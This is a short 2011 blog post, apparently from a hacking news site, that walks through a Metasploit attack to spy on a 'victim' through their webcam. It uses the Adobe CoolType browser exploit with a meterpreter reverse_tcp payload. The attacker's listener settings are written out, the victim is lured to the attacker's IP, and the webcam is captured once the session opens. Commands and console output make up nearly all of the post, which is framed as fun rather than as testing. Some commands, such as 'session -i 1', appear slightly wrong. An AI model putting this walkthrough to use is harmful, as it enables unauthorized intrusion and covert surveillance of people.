Thursday, December 15, 2011

Metasploit: See your victim's Webcam.!!

Wanna have some fun with Metasploit. Open the webcam of your victim and see how is he/she. :P

msf>  show exploits


msf>use windows/browser/adobe_cooltype_sing


msf exploit(adobe_cooltype_sing)> set payload windows/meterpreter/reverse_tcp
payload=> windows/meterpreter/reverse_tcp


msf  exploit(adobe_cooltype_sing) > show options


Module options (exploit/windows/browser/adobe_cooltype_sing):


   Name                Current Setting         Required  Description
   ----                     ---------------               --------    -----------
   SRVHOST            0.0.0.0                        yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT             8080                          yes       The local port to listen on.
   SSL                         false                           no        Negotiate SSL for incoming connections
   SSLCert                                                    no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion             SSL3                         no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                                                 no        The URI to use for this exploit (default is random)



Payload options (windows/meterpreter/reverse_tcp):


   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port



Exploit target:


   Id  Name
   --  ----
   0   Automatic



msf  exploit(adobe_cooltype_sing) > set SRVHOST 192.168.0.58
SRVHOST => 192.168.0.58
msf  exploit(adobe_cooltype_sing) > set SRVPORT 80
SRVPORT => 80
msf  exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf  exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf  exploit(adobe_cooltype_sing) >exploit -j


Let the victim open your IP in his/her browser and when it will be opened, you will get 1 meterpreter session.




msf  exploit(adobe_cooltype_sing) > session -i 1


meterpreter> run webcam


and you will get the webcam of victim. :)
 

The Hacker News